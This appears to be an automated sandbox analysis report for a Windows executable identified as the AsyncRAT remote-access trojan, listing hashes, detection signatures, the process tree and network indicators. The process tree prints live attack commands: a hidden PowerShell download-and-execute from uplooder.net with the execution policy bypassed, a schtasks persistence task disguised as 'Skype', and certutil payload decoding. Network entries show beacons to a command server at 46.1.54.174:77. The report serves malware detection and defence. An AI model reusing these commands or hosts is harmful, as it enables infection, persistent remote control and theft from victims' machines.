Loading ...

Play interactive tourEdit tour

Analysis Report xuXIetZvv6.exe

Overview

General Information

Sample Name:xuXIetZvv6.exe
Analysis ID:391271
MD5:200cb4b34ea0e61fe8454731bf7a107a
SHA1:a6121f8f7d8600c2278e90d5ae622c9b2d3b410b
SHA256:3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3
Tags:exeVjw0rm
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Drops PE files to the startup folder
Drops VBS files to the startup folder
Dynamically executes javascript script code
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample or dropped binary is a compiled AutoHotkey binary
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Parent Process Executions
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • xuXIetZvv6.exe (PID: 6348 cmdline: 'C:\Users\user\Desktop\xuXIetZvv6.exe' MD5: 200CB4B34EA0E61FE8454731BF7A107A)
    • cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' ' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cacls.exe (PID: 6648 cmdline: 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system' MD5: 30C3BBEA1544A7E3EC2103931AEF98FF)
      • certutil.exe (PID: 6712 cmdline: certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: EB199893441CED4BBBCB547FE411CF2D)
      • attrib.exe (PID: 6912 cmdline: attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec' MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • Ne - Copy.exe (PID: 6568 cmdline: 'C:\Users\user\AppData\Roaming\Ne - Copy.exe' MD5: A4A1FA7769DF7C47A6D69FB66AA1EB30)
      • conhost.exe (PID: 6720 cmdline: C:\ProgramData/conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)
        • schtasks.exe (PID: 6876 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wscript.exe (PID: 6704 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))' MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 6748 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • conhost.exe (PID: 6252 cmdline: C:\ProgramData\conhost.exe MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 3020 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 988 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • conhost.exe (PID: 5440 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 5364 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • conhost.exe (PID: 6652 cmdline: 'C:\ProgramData\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
    • schtasks.exe (PID: 6948 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • conhost.exe (PID: 1260 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe' MD5: FDBD7B1910D980CF7273796A0119D252)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
xuXIetZvv6.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmpSUSP_certificate_payloadDetects payloads that pretend to be certificatesDidier Stevens, Florian Roth
    • 0x0:$re1: -----BEGIN CERTIFICATE-----
    C:\Users\user\AppData\Roaming\winlogon.vbsMolerats_Jul17_Sample_5Detects Molerats sample - July 2017Florian Roth
    • 0x469:$a1: Net.WebClient).DowNloAdSTRiNg
    • 0x497:$a2: gist.githubusercontent.com
    C:\Users\user\AppData\Roaming\winlogon.vbsJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmdCertutil_Decode_OR_DownloadCertutil DecodeFlorian Roth
      • 0x8da:$a1: certutil -decode
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbsMolerats_Jul17_Sample_5Detects Molerats sample - July 2017Florian Roth
      • 0x469:$a1: Net.WebClient).DowNloAdSTRiNg
      • 0x497:$a2: gist.githubusercontent.com
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmpMolerats_Jul17_Sample_5Detects Molerats sample - July 2017Florian Roth
            • 0x10d1:$a1: Net.WebClient).DowNloAdSTRiNg
            • 0x1731:$a1: Net.WebClient).DowNloAdSTRiNg
            • 0x10ff:$a2: gist.githubusercontent.com
            • 0x175f:$a2: gist.githubusercontent.com
            00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.xuXIetZvv6.exe.8285a2.2.unpackJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                14.2.powershell.exe.13385685750.3.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  0.2.xuXIetZvv6.exe.8285a2.2.raw.unpackJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    14.2.powershell.exe.1339cff0000.6.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      0.0.xuXIetZvv6.exe.8285a2.2.unpackJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        Click to see the 7 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Drops script at startup locationShow sources
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6888, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs
                        Sigma detected: Conhost Parent Process ExecutionsShow sources
                        Source: Process startedAuthor: omkar72: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\ProgramData/conhost.exe, ParentImage: C:\ProgramData\conhost.exe, ParentProcessId: 6720, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe, ProcessId: 6876

                        Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeMetadefender: Detection: 26%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeReversingLabs: Detection: 41%
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: xuXIetZvv6.exeVirustotal: Detection: 54%Perma Link
                        Source: xuXIetZvv6.exeMetadefender: Detection: 23%Perma Link
                        Source: xuXIetZvv6.exeReversingLabs: Detection: 55%
                        Machine Learning detection for sampleShow sources
                        Source: xuXIetZvv6.exeJoe Sandbox ML: detected
                        Source: xuXIetZvv6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: unknownHTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0
                        Source: xuXIetZvv6.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: wscript.pdbGCTL source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
                        Source: Binary string: scrrun.pdb source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
                        Source: Binary string: C:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, Ne - Copy.exe, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
                        Source: Binary string: EC:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
                        Source: Binary string: wshom.pdbUGP source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
                        Source: Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
                        Source: Binary string: wshom.pdb source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
                        Source: Binary string: scrrun.pdbUGP source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,
                        Source: C:\ProgramData\conhost.exeCode function: 8_2_00007FF7AB002E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exeCode function: 39_2_00007FF772C32E20 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user\AppData\Roaming
                        Source: C:\ProgramData\conhost.exeFile opened: C:\Users\user\AppData

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 46.1.54.174:87 -> 192.168.2.5:49715
                        Uses known network protocols on non-standard portsShow sources
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 77
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 77
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 77
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 77
                        Source: unknownNetwork traffic detected: HTTP traffic on port 77 -> 49709
                        Source: global trafficTCP traffic: 192.168.2.5:49709 -> 46.1.54.174:77
                        Source: Joe Sandbox ViewIP Address: 46.1.54.174 46.1.54.174
                        Source: Joe Sandbox ViewASN Name: MILLENICOM-ASDE MILLENICOM-ASDE
                        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                        Source: unknownHTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49711 version: TLS 1.0
                        Source: unknownHTTPS traffic detected: 144.76.38.100:443 -> 192.168.2.5:49722 version: TLS 1.0
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: unknownTCP traffic detected without corresponding DNS query: 46.1.54.174
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exeCode function: 3_2_000000014007D8A0 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,
                        Source: unknownDNS traffic detected: queries for: www.uplooder.net
                        Source: unknownHTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: tahoo_D0567C33\computer\user\Microsoft Windows 10 Pro\Windows Defender\\Yes\FALSE\Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 46.1.54.174:77Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
                        Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, conhost.exe, 00000011.00000002.494441942.0000027803EF3000.00000004.00000001.sdmpString found in binary or memory: http://46.1.54.174/
                        Source: conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://46.1.54.174/t
                        Source: conhost.exe, 00000011.00000003.246613450.0000027803CEA000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.244935879.00000278037FB000.00000004.00000001.sdmpString found in binary or memory: http://46.1.54.174:77/
                        Source: conhost.exe, 00000011.00000002.494826306.0000027804085000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.491494117.00000278037F5000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.494023948.0000027803CE8000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.494003575.0000027803CE0000.00000004.00000001.sdmpString found in binary or memory: http://46.1.54.174:77/Vre
                        Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmpString found in binary or memory: http://46.1.54.174:77/VreY
                        Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmpString found in binary or memory: http://46.1.54.174:77/Vre_Num
                        Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmpString found in binary or memory: http://46.1.54.174:77/Vree
                        Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmpString found in binary or memory: http://46.1.54.174:77/Vreg
                        Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmpString found in binary or memory: http://46.1.54.174:77/Vrex
                        Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmpString found in binary or memory: http://46.1.54.174:77/Vrey6
                        Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsi
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, powershell.exe, 0000000B.00000002.248780710.00000179D1290000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.493872523.00000133849AF000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                        Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
